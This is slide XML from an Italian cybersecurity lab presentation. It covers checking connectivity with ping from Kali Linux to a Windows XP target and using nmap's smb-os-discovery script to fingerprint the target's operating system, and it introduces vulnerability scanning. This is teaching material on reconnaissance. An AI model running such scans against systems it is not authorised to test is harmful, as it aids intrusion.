              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Eseguire il comando ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Apriamo un terminale su Kali Linux e digitate il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ping seguito dall'indirizzo IP della macchina Windows XP e lo switch -c4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>per specificare il numero di pacchetti da inviare e premete invio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3127"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Interpretare i risultati del ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Se la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>configurazione è corretta,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> vedremo una serie di righe che indicano il tempo impiegato per l'invio di ogni pacchetto, il numero di pacchetti inviati, ricevuti e persi. Se vediamo una risposta simile alla figura a destra, con il 100% dei pacchetti inviati e 0 pacchetti persi, significa che le due macchine possono comunicare correttamente tra loro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3127"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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2184014" y="476151"/>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4046713" y="-258653"/>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2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="9489204" y="-495027"/>
            <a:ext cx="8375131" cy="11605667"/>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10101"/>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0" t="-2194" r="0" b="-2194"/>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010101"/>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010101"/>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010101"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13854766" y="-1857716"/>
            <a:ext cx="7548481" cy="7001216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7001216" w="7548481">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7548481" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7548481" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1956256" y="284284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4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2006532" y="373360"/>
            <a:ext cx="14768151" cy="655340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" spc="-546">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>1.3 - VERIFICA COMUNICAZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 19" id="19"/>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267662" y="1794518"/>
            <a:ext cx="7358823" cy="4847692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4847692" w="7358823">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7358823" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7358823" y="4847692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4847692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9921364" y="8286742"/>
            <a:ext cx="7866804" cy="420235"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="420235" w="7866804">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7866804" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7866804" y="420235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-629971" y="3566610"/>
            <a:ext cx="8849017" cy="3153779"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3153779" w="8849017">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8849017" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8849017" y="3153780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3153780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>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4" id="24"/>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TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8439205" y="1756418"/>
            <a:ext cx="9189802" cy="7205938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Abbiamo effettuato una scansione con il toll nmap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>del target in esame con una feature a disposizione dell’utente: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>NSE ( Nmap Scripting Engine)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nmap Scripting Engine permette all’utente di eseguire piccoli script per automatizzare dei task di rete, come per esempio la risoluzione dell’enumerazione di DNS, attacchi brute force, host discovery e tanti altri.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Gli script NSE sono nella cartella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>/usr/share/nmap/scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per eseguire uno script con NSE si può utilizzare lo switch --script seguito dal nome dello script in esame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In questo caso abbiamo utilizzato uno degli script presenti smb-os-discovery, che prova a determinare la versione del sistema operativo di un sistema target dal banner del servizio SMB (il servizio SMB è utilizzato per l’accesso a risorse condivise su una rete, come stampanti, file ecc...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nel nostro caso abbiamo utilizzato il seguente comando specificando l’IP del target:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2732"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="2700000">
            <a:off x="3943861" y="6864461"/>
            <a:ext cx="3891096" cy="1969867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1969867" w="3891096">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3891096" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3891096" y="1969867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1969867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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9254B"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 2" id="2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1423386" y="7533059"/>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Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1981961" y="100007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792020" y="-1753181"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6472290" y="1344889"/>
            <a:ext cx="4760715" cy="941989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57" t="0" r="-22257"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5" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11879261" y="-263587"/>
            <a:ext cx="7548481" cy="7001216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7001216" w="7548481">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7548481" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7548481" y="7001217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7001217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13854766" y="802093"/>
            <a:ext cx="3597471" cy="3444579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3444579" w="3597471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3597471" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597471" y="3444579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3444579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925" y="520008"/>
            <a:ext cx="14768151" cy="1217315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" spc="-546">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>GIORNO 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1107704" y="4705590"/>
            <a:ext cx="15381560" cy="2254251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>2.0 - Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11737262" y="9539287"/>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Medium"/>
              </a:rPr>
              <a:t>BUILD WEEK - TEAM 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="9539287"/>
            <a:ext cx="5265339" cy="3822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Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-870120" y="638080"/>
            <a:ext cx="4369456"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6489264" y="6761534"/>
            <a:ext cx="3597471" cy="3444579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3444579" w="3597471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3597472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597472" y="3444579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3444579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="646430"/>
            <a:ext cx="5265339" cy="382270"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>LABORATORIO CYBERSECURITY</a:t>
            </a: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DAGGZwCnoy8</dc:identifier>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-01T06:04:30Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:title>BW2</dc:title>
</cp:coreProperties>
</file>